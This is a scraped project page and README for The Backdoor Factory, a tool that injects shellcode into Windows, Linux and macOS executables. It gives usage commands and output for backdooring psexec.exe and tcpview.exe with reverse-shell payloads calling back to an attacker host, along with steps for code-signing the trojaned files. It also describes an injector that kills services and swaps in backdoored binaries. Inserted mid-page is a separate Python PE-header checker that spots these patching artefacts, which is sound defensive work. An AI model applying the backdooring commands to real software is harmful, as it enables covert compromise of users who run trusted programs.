
secretsquirrel / The Backdoor Factory

Licence: bsd-3-clause
Patch PE, ELF, Mach-O binaries with shellcode new version in development, available only to sponsors


Projects that are alternatives of or similar to The Backdoor Factory

HatVenom
HatVenom is a HatSploit native powerful payload generation tool that provides support for all common platforms and architectures.
Stars: ✭ 84 (-97.11%)
Mutual labels:  elf, macho, pe
Lief
Authors
Stars: ✭ 2,730 (-5.99%)
Mutual labels:  elf, pe, macho
byteripper
A tool to extract code from individual functions in a library.
Stars: ✭ 14 (-99.52%)
Mutual labels:  elf, macho
dwex
DWARF Explorer - a GUI utility for navigating the DWARF debug information
Stars: ✭ 58 (-98%)
Mutual labels:  elf, macho
Android Disassembler
Disassemble any file, including .so (NDK, JNI), Windows PE (EXE, DLL, SYS, etc.), Linux binaries, libraries, and any other file such as pictures, audio, etc. (for fun), on Android. Capstone-based disassembler application for Android. Reversing app for Android NDK shared libraries, Windows binaries, etc.
Stars: ✭ 250 (-91.39%)
Mutual labels:  capstone, elf
Checksec.py
Checksec tool in Python, Rich output. Based on LIEF
Stars: ✭ 188 (-93.53%)
Mutual labels:  elf, pe
ftrace
Simple Function calls tracer
Stars: ✭ 65 (-97.76%)
Mutual labels:  capstone, elf
Detect It Easy
Program for determining types of files for Windows, Linux and MacOS.
Stars: ✭ 2,982 (+2.69%)
Mutual labels:  elf, macho
Rop Tool
A tool to help you write binary exploits
Stars: ✭ 590 (-79.68%)
Mutual labels:  elf, pe
Dissection
The dissection of a simple "hello world" ELF binary.
Stars: ✭ 427 (-85.3%)
Mutual labels:  elf, pe
Automated-Malware-Analysis-List
My personal Automated Malware Analysis Sandboxes and Services
Stars: ✭ 20 (-99.31%)
Mutual labels:  elf, pe
Filebytes
Library to read and edit files in the following formats: Executable and Linking Format (ELF), Portable Executable (PE), MachO and OAT (Android Runtime)
Stars: ✭ 105 (-96.38%)
Mutual labels:  elf, pe
Goblin
An impish, cross-platform binary parsing crate, written in Rust
Stars: ✭ 591 (-79.65%)
Mutual labels:  elf, pe
Cave miner
Search for code cave in all binaries
Stars: ✭ 218 (-92.49%)
Mutual labels:  elf, pe
Xhook
🔥 A PLT hook library for Android native ELF.
Stars: ✭ 2,996 (+3.17%)
Mutual labels:  elf
Faerie
Magical ELF and Mach-o object file writer backend
Stars: ✭ 187 (-93.56%)
Mutual labels:  elf
Elfparser
Cross Platform ELF analysis
Stars: ✭ 228 (-92.15%)
Mutual labels:  elf
Chain Reactor
Chain Reactor is an open source framework for composing executables that simulate adversary behaviors and techniques on Linux endpoints.
Stars: ✭ 206 (-92.91%)
Mutual labels:  elf
Elfkit
rust elf parsing, manipulation and (re)linking toolkit
Stars: ✭ 180 (-93.8%)
Mutual labels:  elf
Geyser
A bridge/proxy allowing you to connect to Minecraft: Java Edition servers with Minecraft: Bedrock Edition.
Stars: ✭ 2,851 (-1.83%)
Mutual labels:  pe

The new version of BACKDOOR FACTORY is available! Get access here: https://github.com/sponsors/secretsquirrel

The Backdoor Factory (BDF)

For security professionals and researchers only.

The goal of BDF is to patch executable binaries with user-supplied shellcode and then continue normal execution of the binary as it ran before patching.

Chat: https://gitter.im/secretsquirrel/the-backdoor-factory

Black Hat Arsenal

Black Hat USA 2015:

Video: https://www.youtube.com/watch?v=OuyLzkG16Uk

Paper: https://www.blackhat.com/docs/us-15/materials/us-15-Pitts-Repurposing-OnionDuke-A-Single-Case-Study-Around-Reusing-Nation-State-Malware-wp.pdf

Shmoocon 2015:

Video: https://archive.org/details/joshpitts_shmoocon2015

Paper: https://www.dropbox.com/s/te7e35c8xcnyfzb/JoshPitts-UserlandPersistenceOnMacOSX.pdf

DerbyCon 2014:

Video: http://www.youtube.com/watch?v=LjUN9MACaTs

DerbyCon 2013:

Video: http://www.youtube.com/watch?v=jXLb2RNX5xs

Injection Module Demo: http://www.youtube.com/watch?v=04aJAex2o3U

Slides: http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory

Contact the developer on:

IRC: irc.freenode.net #BDFactory

Twitter: @midnite_runr

Under a BSD 3 Clause License

See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki


Installing

DOCKER

docker pull secretsquirrel/the-backdoor-factory
docker run -it secretsquirrel/the-backdoor-factory bash
# ./backdoor.py

### OLD SCHOOL

#### Dependencies

To use OnionDuke you MUST be on an Intel machine, because aPLib has no support for the ARM chipset yet.

Capstone engine can be installed from PyPi with:

sudo pip install capstone

Pefile, most recent:

https://code.google.com/p/pefile/

osslsigncode (included in repo):

http://sourceforge.net/p/osslsigncode/osslsigncode/ci/master/tree/

Kali Install:

  apt-get update
  apt-get install backdoor-factory

Other *NIX/MAC INSTALL:

./install.sh

This installs Capstone 3.01 and uses pip to install pefile.

UPDATE:

./update.sh

Supporting:

Windows PE x86/x64, ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32),
and Mach-O x86/x64, and those formats in FAT files

Packed Files: PE UPX x86/x64

Experimental: OpenBSD x32

Some executables have built-in protections, so this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises. I'm on the verge of bypassing NSIS, so bypassing these checks will be included in the future.

Many thanks to Ryan O'Neill (ryan 'at' codeslum <d ot> org). Without him, I would still be trying to do stupid things with the ELF format. Also thanks to Silvio Cesare for his 1998 paper (http://vxheaven.org/lib/vsc01.html), on which these ELF patching techniques are based.

Recently tested on many binaries.

./backdoor.py -h

Usage: backdoor.py [options]


## Features:

### PE Files

Can find all code caves in an EXE/DLL.
By default, clears the pointer to the PE certificate table, thereby unsigning a binary.
Can inject shellcode into code caves or into a new section.
Can find if a PE binary needs to run with elevated privileges.
When selecting code caves, you can use the following commands:
  -Jump (j), for code cave jumping
  -Single (s), for patching all your shellcode into one cave
  -Append (a), for creating a code cave
  -Ignore (i or q), never mind, ignore this binary
Can ignore DLLs
Import Table Patching
AutoPatching (-m automatic)
Onionduke (-m onionduke)

### ELF Files

Extends the TEXT segment by 1000 bytes and injects shellcode into that region of code.

### Mach-O Files

Pre-Text Section patching and signature removal

### Overall

The user can:
  -Provide custom shellcode.
  -Patch a directory of executables/dlls.
  -Select x32 or x64 binaries to patch only.
  -Include BDF in other Python projects; see pebin.py and elfbin.py

Sample Usage:

### Patch an exe/dll using an existing code cave:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory
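The two default side effects of PE patching described above (the certificate table pointer is cleared, and the section holding the chosen cave has its flags changed so it can execute, visible in the output as "Changing Section Flags" and "Overwriting certificate table pointer") are also the header-level artefacts a defender can look for. The following is an added example and not code from the BDF project or this README: a dependency-free Python parser for PE32/PE32+ headers plus a small set of checks, run over two constructed header images (no real code inside). The function names parse_pe, indicators and build_pe, and the sample section layouts, are my own assumptions.

```python
import struct

# Section flags and the data-directory index, as defined in the PE/COFF spec.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # Authenticode certificate table
CODE_SECTION_NAMES = {b".text", b"CODE", b".code", b"INIT"}


def parse_pe(data):
    """Parse PE32/PE32+ headers: entry RVA, Security directory, section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsect, _, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x20B:          # PE32+ (x64): the 8-byte ImageBase shifts the layout
        nrva_off, dd_off = opt + 108, opt + 112
    elif magic == 0x10B:        # PE32 (x86)
        nrva_off, dd_off = opt + 92, opt + 96
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    nrva = struct.unpack_from("<I", data, nrva_off)[0]
    security = (0, 0)
    if nrva > IMAGE_DIRECTORY_ENTRY_SECURITY:
        security = struct.unpack_from(
            "<II", data, dd_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    sections = []
    for i in range(nsect):
        name, vsize, va, _, _, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + size_opt + 40 * i)
        sections.append({"name": name.rstrip(b"\0"), "va": va,
                         "vsize": vsize, "chars": chars})
    return {"entry": entry, "security": tuple(security), "sections": sections}


def indicators(pe):
    """Header-level findings matching the README's default PE patching:
    a cleared certificate table pointer and a cave section made executable."""
    findings = []
    if pe["security"] == (0, 0):
        findings.append("no Authenticode certificate table: unsigned, "
                        "or the signature pointer was cleared")
    for s in pe["sections"]:
        name = s["name"].decode("latin-1")
        x, w = s["chars"] & IMAGE_SCN_MEM_EXECUTE, s["chars"] & IMAGE_SCN_MEM_WRITE
        if x and w:
            findings.append("section %s is both writable and executable" % name)
        elif x and s["name"] not in CODE_SECTION_NAMES:
            findings.append("non-code section %s carries the execute flag" % name)
    holder = [s for s in pe["sections"]
              if s["va"] <= pe["entry"] < s["va"] + s["vsize"]]
    if not holder:
        findings.append("entry point 0x%x lies outside every section" % pe["entry"])
    elif not holder[0]["chars"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append("entry point is in a non-executable section")
    return findings


def build_pe(sections, entry_rva, security=(0, 0)):
    """Construct a minimal PE32+ header image for the demo (constructed sample,
    no real code). sections: (name, virtual_address, size, characteristics)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x22)
    opt = bytearray(240)                 # PE32+ optional header, 16 data directories
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<I", opt, 108, 16)
    struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, *security)
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), size, va,
                                size, va, 0, 0, 0, 0, chars)
                    for name, va, size, chars in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + hdrs


TEXT = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
# Constructed samples: a signed binary with normal flags, and one that looks like
# BDF's default output (certificate pointer zeroed, .data made executable).
SIGNED_CLEAN = build_pe([(b".text", 0x1000, 0x2000, TEXT),
                         (b".data", 0x3000, 0x1000, DATA)],
                        entry_rva=0x1100, security=(0x5000, 0x800))
BDF_STYLE = build_pe([(b".text", 0x1000, 0x2000, TEXT),
                      (b".data", 0x3000, 0x1000, DATA | IMAGE_SCN_MEM_EXECUTE)],
                     entry_rva=0x1100)

if __name__ == "__main__":
    for label, image in (("signed-clean", SIGNED_CLEAN), ("bdf-style", BDF_STYLE)):
        print(label, indicators(parse_pe(image)) or ["no findings"])
```

On a real file, read it with open(path, "rb") and pass the bytes to parse_pe; a missing certificate table on its own only means "unsigned", so treat it as a finding worth correlating with the section-flag checks and with a known-good copy of the binary rather than as proof of tampering.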

### Patch an exe/dll by adding a code section:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

### Patch a directory of exes:

./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a

...output too long for README...


### User supplied shellcode:

msfpayload windows/exec CMD='calc.exe' R > calc.bin

./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin

This will pop calc.exe on a target Windows workstation. So 1337. Much pwn. Wow.


### PE Code Signing

BDF can sign PE files if you have a codesigning cert. It uses osslsigncode. Put your signing cert and private key in the certs/ directory. Prep your certs using openssl commands from this blog post: http://secureallthethings.blogspot.com/2015/12/add-pe-code-signing-to-backdoor-factory.html

Put your private key password in a file (gasp) like so (exactly like so):

echo -n yourpassword > certs/passFile.txt

Name your certs EXACTLY as follows:

signingCert.cer => certs/signingCert.cer
signingPrivateKey.pem => certs/signingPrivateKey.pem

Your certs/ directory should look exactly like this:

certs
├── passFile.txt
├── signingPrivateKey.pem
└── signingCert.cer

Enable PE Code Signing with the -C flag as so:

./backdoor.py -f tcpview.exe -s iat_reverse_tcp_inline -H 172.16.186.1 -P 8080 -m automatic -C

On successful run you should see this line in BDF output:

[*] Code Signing Succeeded

### Hunt and backdoor: Injector | Windows Only

The injector module will look for target executables to backdoor on disk. It will check whether you have identified the target as a service, check whether the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file as either file.exe.old or with another suffix of your choice, and attempt to restart the process or service.
Edit the Python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

### Changelog

#### 01/11/2016

  • Fix entry point truncation bug that led to improper recovery in rare instances

#### 07/04/2016

  • Support for dynamic paths in BDFProxy for preprocessor

#### 06/19/2016

  • Added the preprocessor and other optimizations
  • The preprocessor allows the user to modify the binary prior to payload injection
  • Invoke with the -p flag
  • See samples in ./preprocessor/

#### 12/20/2015

  • Added directory paths to BDF to find certs directory.

#### 12/18/2015

#### 11/17/2015

  • Bug fix in rsrc section for onionduke patching, and removal of the random win32 version value in the PE header

#### 11/13/2015

  • Added proper truncating of a PE file after the signature pointer is cleared in the PE header (i.e. proper unsigning), resulting in better support for IAT patching

#### 10/19/2015

  • Fixed bug in IAT directory cave assignment that caused BDF crash
  • Made the feature optional with -A flag

#### 10/13/2015

  • Changed the Import Table Directory modifications from adding a new section to using an existing code cave
#### 08/12/2015

  • Added 'replace' PATCH_METHOD - a straight PE copy pasta of the supplied binary
  • More for usage with BDFProxy

    Usage: ./backdoor.py -f weee.exe -m replace -b supplied_binary.exe

#### 08/11/2015

  • Stability fix for auto cave selection in rare cases of overlapping caves

#### 08/05/2015

  • BH USA UPDATES, w00t!
  • OnionDuke, use -m onionduke
    • Supports user supplied exe's and dll's
    • Usage: ./backdoor.py -f originalfile.exe -m onionduke -b pentest.dll/exe
  • XP MODE: prior IAT based payloads did not support XP, Wine, or Windows 98. If you need to support XP use the -X flag. I'm not supporting anything less than XP (and not XP x64).
  • Invoke UAC prompt to run as admin (experimental): patches the PE manifest if requestedExecutionLevel exists.
  • Stability updates:
    • Fixed a bug with incorrect RVA calculation when jmp'ing across 2+ code caves
    • Better checks to determine if a new section for the IAT will write into appended data and therefore fail
  • Speed improvements:
    • Faster code cave finding while using automatic mode (-m automatic)
    • Faster rsrc parsing to find manifest file
#### 5/01/2015

  • Bug fix to the reverse_tcp_stager_threaded payload when using single cave payloads

#### 4/28/2015

  • Adding check for Bound Imports (PE files with bound imports will not be patched)

#### 4/14/2015

So many updates:

#### 2/14/2015 I <3 you guys

  • Added Import Address Table patching for PEs to support iat_reverse_tcp payloads that use the import table for winAPI calls. If the binary you are patching does not have LoadLibraryA and GetProcAddress, for example, BDF will patch them in to a new Import Table in a new section. Supports x64/x86 PEs.
  • Added iat_reverse_tcp for x64 PEs.
  • Bug fixes and improvements

#### 1/1/2015

Happy New Year!

Two new OS X payloads! The delay payload: delay_reverse_shell_tcp

-B 30 --> delay the payload for 30 seconds; the main code runs right away.

Pinned a fixed capstone commit for building into BDF, since the capstone 'next' repo breaks BDF.

Fixes to support the cython capstone implementation's null byte truncation issue
#### 12/27/2014

Added payloadtests.py

This script outputs patched files into backdoored/ so that the user can test the payloads as they wish. Each payload type increments the port used by one.

Usage: payloadtest.py binary HOST PORT

#### 12/17/2014

OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp

-B 15 --> set beacon time to 15 secs

Bug fix to support OS X for BDFProxy

#### 10/11/2014

PE UPX Patching Added

#### 9/26/2014

Mach-O x86/x64 added

x86 IAT payload optimization

#### 7/31/2014

Added support for ARM x32 LE ELF patching

#### 7/22/2014

Added FreeBSD x32 ELF patching support

Change to BSD 3 Clause License

#### 7/13/2014

Incorporated Capstone: http://www.capstone-engine.org/

During the process of adding Capstone, I removed about 500 lines of code. That's pretty awesome.

Renamed loadliba_reverse_tcp to iat_reverse_tcp.

Small optimizations for speed.

#### 5/30/2014

Added a new win86 shellcode: loadliba_reverse_tcp

